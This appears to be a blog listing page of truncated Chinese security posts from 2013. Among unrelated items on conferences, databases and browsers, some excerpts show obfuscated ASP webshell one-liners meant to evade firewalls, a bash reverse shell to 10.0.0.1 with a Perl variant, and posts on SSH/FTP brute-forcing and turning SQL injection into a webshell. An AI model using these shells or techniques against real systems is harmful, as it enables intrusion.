资源

admin 12年前 (2013-08-27) 1984浏览 0评论

8月21日上周三，小编来到北京金台饭店，参加了由互联网安全厂商知道创宇主办的第二届 Web安全论坛Kcon v2，这次会议对外不收取任何费用。值得一提的是，这次Kcon和中国的顶级黑客会议Xcon在同一个酒店，同一个会议厅内，而且提前Xcon一天，大...

admin 12年前 (2013-08-24) 1863浏览 0评论

它们游离在法律边缘，但影响着普通用户的网络环境，甚至参与制定地上规则 阑夕 2013-04-09 07:05 前阿里巴巴集团高级安全专家 @aullik5 曾在其微信公众帐号“道哥的黑板报”上分享了一则关于“黑客”的故事，文章颇具传奇小说的风格，不少...

admin 12年前 (2013-08-23) 1770浏览 0评论

1.完整备份一次(保存位置当然可以改) backup database 库名 to disk = ‘c:\ddd.bak’;– 2.创建表并插曲入数据 create table [dbo].[dtest] ([cm...

admin 12年前 (2013-08-23) 2982浏览 0评论

几个变性的asp–过防火墙 过狗效果都不错 1 <%Y=request("x")%> <%execute(Y)%> 1 <%eval (eval(chr(114)+chr(101)+c...

admin 12年前 (2013-08-21) 1994浏览 0评论

Backtrack 已经内置了一个由” Offebnsive Security”提供的漏洞利用程序集的数据库Exploit-DB，可以用于平时的参考和使用。访问的方法是在命令提示符中输入一下命令： 1 # cd /pentest/expl...

admin 12年前 (2013-08-21) 1940浏览 2评论

直到最近为止，对拥有数之不尽的独立地址的互联网进行整体扫描还是一种非常缓慢而“劳动密集型”的过程。举例来说，有人曾使用nmap进行过一次扫描，想要搜集有关加密技术在线使用量的数据。其结果是，这一过程足足花了两三个月时间。 密歇根大学研究人员觉得，他...

admin 12年前 (2013-08-12) 1628浏览 0评论

一周之内真的能摸清一个行业？ 在和咨询、投行、投资、猎头这些行业的人聊天的时候，我反复听到“一周”这个时间，于是我也开始好奇：你们是在什么情况下需要在一个星期之内了解一个行业？你们都是如何做到在一个星期之内摸清一个行业的？ 在一周之内“摸清”一个行业...

admin 12年前 (2013-07-23) 2668浏览 0评论

Patator是一款全能暴力破解测试工具，采用模块化设计并具有灵活的可用性。 功能和模块   * ftp_login : Brute-force FTP * ssh_login : Brute-force SSH * telnet_...

admin 12年前 (2013-07-21) 3736浏览 2评论

这篇文章谈论简单的技术，利用sql注入(SQLi)漏洞，并获得一个webshell，所有的演示都是用DVWA（渗透测试演练系统）.对于SQL注入利用，有以下几个基本步骤: 1,发现SQL注入点; 2,通过mysql数据库帮助，进一步进行注入，获取帐号...

admin 12年前 (2013-07-17) 1717浏览 0评论

bash版本： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ，注意某些linux不支持 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;...

admin 12年前 (2013-07-17) 2508浏览 3评论

2013.05.21 No Comments 前言：作者是个懒人，又犯了五月病，什么都懒得做，编辑了好几次文章，后来都不了了之了 但是时间紧迫，下个月就要跨省去外地了，看见大家好像对狗狗很有热情，所以就一口气把一篇笔记发出来了 本来没有那么长的，...

admin 12年前 (2013-07-17) 1430浏览 1评论

1、 什么是WebApp Pentesting WebApp Pentesting，由PentesterLab出品。官方给自己的定义是一个简单又十分有效学习渗透测试的演练平台。它提供诸多的漏洞系统以供网络安全发烧友进行测试和让黑阔们更加深刻地且透彻理...

admin 12年前 (2013-07-16) 1709浏览 1评论

上周四，Google宣布从WebKit 分支出自己的浏览器渲染引擎 Blink。很多人觉得这像是晴天霹雳，或者甚至是迟到的愚人节笑话，但是其实这件事情是难以避免的，而且是历史的重演。 什么是WebKit？它到底是谁的？ WebKit 是一个开源的浏...

admin 12年前 (2013-07-15) 1700浏览 1评论

Smarthosts是一个托管在谷歌代码上的项目，您可以轻松利用本项目使用到一份稳定的Hosts文件。 这份Hosts文件可以帮助您顺利打开一些网站，提高某些国外服务的打开或下载速度。 报告问题? 订阅SVN更新 | Github镜像 | So...

admin 12年前 (2013-07-13) 2556浏览 1评论

错误代码列表 CURLE_UNSUPPORTED_PROTOCOL (1) – 您传送给 libcurl 的网址使用了此 libcurl 不支持的协议。 可能是您没有使用的编译时选项造成了这种情况（可能是协议字符串拼写有误，或没有指定协议 libc...

admin 12年前 (2013-07-08) 5074浏览 0评论

一种Ajax网页内容的抓取方法及系统”专利   www.tecsoo.com下载   抓取AJAX网页的方法－Firefox组件，C#集成 现在AJAX的使用越来越广泛了，但是如果经常写网页抓取程序的人会发现，很多网页内容是通用AJAX进...

admin 12年前 (2013-07-08) 2019浏览 0评论

这两天要处理一些数据，用一些数据库管理工具比如navicat for mysql 、 sqlyog、以及phpmyadmin之类的工具，试了很多，发现都导入不全， 蛋碎了，最后还是选择写SQL语句来搞吧，mysql里面有个load data infi...

admin 12年前 (2013-07-07) 1865浏览 0评论

Lmy分享,搭建过程遇到的问题和解决方法如下： ======================================= 前奏： 1 、用命令解压xssplatform.zip，然后修改config.php里面的数据库连接字段，包括用户名，密码...

admin 12年前 (2013-07-07) 2356浏览 0评论

2012-05-30 14:43 站长之家（chinaz.com）5月30日报道：国内首个基于PHP的开源社交问答程序anwsion今日发布测版本。Anwsion问答系统是一个类似知乎以问答为基础的完全开源的社交网络建站程序，基于 PHP+MYSQL...

admin 12年前 (2013-07-07) 1415浏览 0评论

习科道展网络顾问团队经过多年的努力，已经有核心成员13人，占到了习科道展公司近大半人数，整个团队乃至整个公司是典型的“少而精”式发展。 少，既不是指财力或者实力少，而是人员数量少； 精，指团队人员建制精简，没有打酱油的，每个人都在团队中高效运转。 团...